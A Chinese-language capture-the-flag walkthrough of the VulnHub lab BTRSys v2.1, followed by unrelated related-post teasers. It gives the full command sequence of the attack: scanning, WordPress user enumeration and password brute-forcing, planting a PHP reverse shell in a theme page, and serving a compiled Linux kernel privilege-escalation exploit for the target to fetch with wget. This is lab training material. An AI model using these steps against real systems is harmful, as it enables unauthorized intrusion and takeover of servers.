2. 程式人生 > 實用技巧 >BTRSys: v2.1

BTRSys: v2.1

阿新 發佈:2020-10-18

靶機地址:https://www.vulnhub.com/entry/btrsys-v21,196/

靶機難度:初級/中等

nmap掃描獲得靶機ip:192.168.40.141

nmap -sP 192.168.40.0/24

掃描靶機開放埠,開放了21、22、80埠

nmap -sV -p- 192.168.40.141

用dirb掃描發現該網站是wordpress搭建的

dirb http://192.168.40.141

用wpscan列舉使用者和外掛,找到了兩個使用者btrisk和admin

wpscan --url http://192.168.40.141/wordpress -e u vp

爆破出使用者admin的密碼admin

wpscan --url http://192.168.40.141/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

登入wordpress,發現可以修改頁面

把php的反彈shell寫入404頁面(這裡反彈shell用的是kali的/usr/share/webshells/php/php-reverse-shell.php),並且用kali的nc監聽,然後訪問頁面http://ip/wordpress/wp-content/themes/twentyfourteen/404.php

用python3開啟互動式tty

檢視核心版本為ubuntu 4.4.0

uname -a

在kali上面找一下對應版本的提權指令碼

searchsploit ubuntu 4.4.0 | grep "Privilege Escalation

將提權指令碼編譯後放到/var/www/html,讓靶機wget到/tmp目錄執行

searchsploit -m 44298
gcc 44298.c -o getroot
mv getroot /var/www/html/
/etc/init.d/apache2 start

成功提權

參考資料:https://www.hackingarticles.in/hack-btrsys-v2-1-vm-boot2root-challenge/

相關推薦

BTRSys: v2.1

靶機地址:https://www.vulnhub.com/entry/btrsys-v21,196/ 靶機難度:初級/中等 nmap掃描獲得靶機ip:192.168.40.141

XXL-JOB v2.1.1 釋出,分散式任務排程平臺

XXL-JOB 正在角逐 “2019年度最受歡迎中國開源軟體”,期待您寶貴的一票!投票連結

Mix PHP V2.1 釋出,基於 Swoole 4.4+ 單執行緒協程 PHP 框架

MixPHP 是什麼 一個基於 Swoole 開發的高效能 PHP 框架,經過兩年發展收穫了很多中小型團隊的支援,框架版本經歷了:

nginxWebUI v2.1.4

目錄簡介技術說明安裝配置使用問題找回密碼 簡介 官網 GitHub 作者陳釔蒙 Java編寫的軟體,實現頁面方式配置nginx的各項功能, 包括http協議轉發, tcp協議轉發, 反向代理, 負載均衡, ssl證書自動申請、續簽、配置等,

《孤島危機:重製版》v2.1 更新支援英偉達 DLSS,效能提升 40%

3月13日訊息根據外媒 Neowin 訊息,《孤島危機:重製版》的開發商 Crytek 宣佈將為 PC 版遊戲釋出 2.1 版免費更新,帶來了英偉達 DLSS 深度學習超取樣功能,這是該公司去年承諾。

火端搜尋程式V2.1偽靜態規則

後臺偽靜態設定 火端搜尋程式2.1版偽靜態全新調整了,更簡單的規則,後臺隨時自定義偽靜態規則,不用再手動修改檔案。目錄格式還是.html字尾模式有你決定!

火端搜尋v2.1自行二開加入xml偽靜態

火端搜尋v2.1自行二開加入xml偽靜態,根據詞庫包生成xml,說幹就幹 首先在index.php檔案中找到:

uDock for Mac(Dock欄快速啟動程式) v2.1啟用版

內容介紹 如何快速啟動程式塢?試試這款uDock,uDock for Mac是一款Dock欄快速啟動工具,在系統工具欄中工作,它幾乎是隱形的,並且在您需要時隨時準備就緒,且可以輕鬆訪問正在執行的程序和所有驅動器。測試環境

WinFramework輕量框架V2.1與旗艦版V5.1功能區別

WinFramework輕量框架V2.1與旗艦版V5.1功能區別 1. WinFrameworkV2.1 - 輕量級框架特點與優勢

Win11 第三方 Files v2.1 標籤式檔案管理器釋出:原生支援 ARM64,可隨系統自啟動

1 月 12 日訊息,Files(檔案)是一款適用於Windows 10/Windows 11的免費的第三方開原始檔管理器,它利用了 Windows 平臺的最新功能,包括流暢設計、無縫更新和 API,實現了使用者期望的效能和生命週期行為。近日,

Arjun v2.1.5: 一款HTTP引數挖掘套件

概述         Arjun 可以通過字典的方式找到 目標URL 的查詢引數。 大家知道Web 應用程式使用引數(或查詢)來接受使用者輸入, 比如 http://api.example.com/v1/userinfo?id=751634589。

部落格園 SimpleMemory 部落格面板設定v2.1.0版本

這個部落格面板也是一位超級大佬所做 github專案地址:https://github.com/BNDong/Cnblogs-Theme-SimpleMemory

柒比貳主題 B2 V2.5.1 破解無限制版

柒比貳主題 B2 V2.5.1是我之前沒有接觸過的一個主題,某天,有人加我QQ說要我破解柒比貳主題 B2 V2.5.1,於是,我答應下來,當時說20OK嗎,我說可以,特麼的不小心看成了200元O不OK,因為白天沒時間,只能晚上搞,把

Game嗶嗶嗶遊戲平臺 v2.4.0.1

Game嗶嗶嗶遊戲平臺是一款垂直於pc端獨立遊戲領域的高品質遊戲玩家社群平臺,這裡所有的資源都是從全球海量的遊戲精選而出的,只為和專業的遊戲玩家一起分享遊戲樂趣。在這裡,你可以找到熱門大作、小眾精品,為使用

k8s登入harbor報錯:Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request cance

[root@k8s-node02 ~]# docker login 192.168.180.105:1180 Username: admin Password: Error response from daemon: Get http://192.168.180.105:1180/v2/: net/http: request canceled while waiting for connecti

Airtool for Mac(系統選單欄網路工具) v2.3.1啟用版

內容介紹 Airtool Mac版是一個位於Mac系統選單欄網路工具軟體,Airtool Mac版為使用者提供檢查內建Wi-Fi介面卡的狀態和通道配置的基本功能,以及在單通道和多通道上執行幀捕獲。下載:https://www.macv.com/mac/2

FireAlpaca for Mac(專業mac繪圖軟體) v2.6.1官方版

https://www.macv.com/mac/2465.html?id=NDcwODU%3D FireAlpaca擁有直觀簡潔的操作介面,使用起來很容易於上手,具有ps的圖層繪畫方式,擁有魔法棒、筆刷、噴槍、吸管、水桶等繪畫常用工具,可以自定義圖片的大小

創米小白將於 9 月 1 日釋出小白集塵掃地機器人 V2 UV,可清理貓毛

8 月 29 日訊息創米小白今日釋出了一張預熱海報,新產品小白集塵掃地機器人 V2 UV 將於 9 月 1 日晚 8 點正式釋出。官方表示,這款產品專為養貓家庭設計,能夠清理貓毛。

小米相簿推送 V2.3.0.1 版灰度更新:優化排版和效能,提高使用效率

9 月 3 日訊息感謝網友投稿,9 月 1 日小米為開發版使用者推送了小米相簿 App V2.3.0.2 版,屬於灰度更新,只向少部分使用者提供。這一版本優化了介面排版,照片頁和相簿裡預設頁可以按月聚類,提高圖片查詢效率。雙

創新推出 Audigy Fx V2 音效卡:5.1 聲道 24bit/192kHz,509 元

10 月 6 日訊息根據外媒 techpowerup 訊息,創新今日正式推出 Sound Blaster Audigy Fx V2 音效卡。這款產品採用 PCIe 介面,具有 120dB SNR 信噪比,支援 24bit/192kHz PCM 音訊,以及 DSD256 規格回放。創新此款產